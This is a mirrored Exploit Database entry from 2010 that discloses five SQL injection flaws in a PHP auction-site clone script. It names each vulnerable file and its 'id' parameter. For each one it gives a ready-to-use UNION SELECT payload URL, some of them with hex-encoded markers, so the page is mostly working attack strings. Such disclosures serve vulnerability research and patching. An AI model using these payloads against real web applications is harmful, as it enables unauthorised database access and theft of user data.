Ebay Clone from clone2009 – SQL Injection

• Exploit Database
• 142 阅读

• 作者： Hamza 'MizoZ' N.
  日期： 2010-01-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11164/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54

  /*   Name : Ebay Clone from (clone2009.com<http://clone2009.com>) Site : http://www.clone2009.com/   Author : Hamza &apos;MizoZ&apos; N. Email : mizozx[at]gmail[dot]com   Greetz : Zuka , GreyMen :)   */   # 1st SQL injection :   File : gotourl.php , Get : id   [HOST]/[PATH]/gotourl.php?id=-1+union+select+version()--   => You will be redirected to [HOST]/[PATH]/[VERSION]   Demo : http://server/gotourl.php?id=0+union+select+version()--   # 2nd SQL Injection :   File : product_desc.php, Get : id   [HOST]/[PATH]/product_desc.php?id=[INJECTION]   Demo : http://server/product_desc.php?id=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--   # 3th SQL Injection :   File : view_items.php , Get : id   [HOST]/[PATH]/view_items.php?id=[INJECTION]   Demo : http://server/view_items.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c666f6e7420636f6c6f723d22726564223e4845524520494e4a454354494f4e3c2f666f6e743e,12,13,14,15,16,17,18--   # 4th SQL Injection :   File : bidhistory.php , Get : id   [HOST]/[PATH]/bidhistory.php?id=[INJECTION]   Demo : http://server/bidhistory.php?id=-45+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--   # 5th SQL Injection :   FIle : view_feedback.php , Get : id   [HOST]/[PATH]/view_feedback.php?id=[INJECTION]   Demo : http://server/view_feedback.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c68313e484552453c2f68313e,12,13,14,15,16,17,18--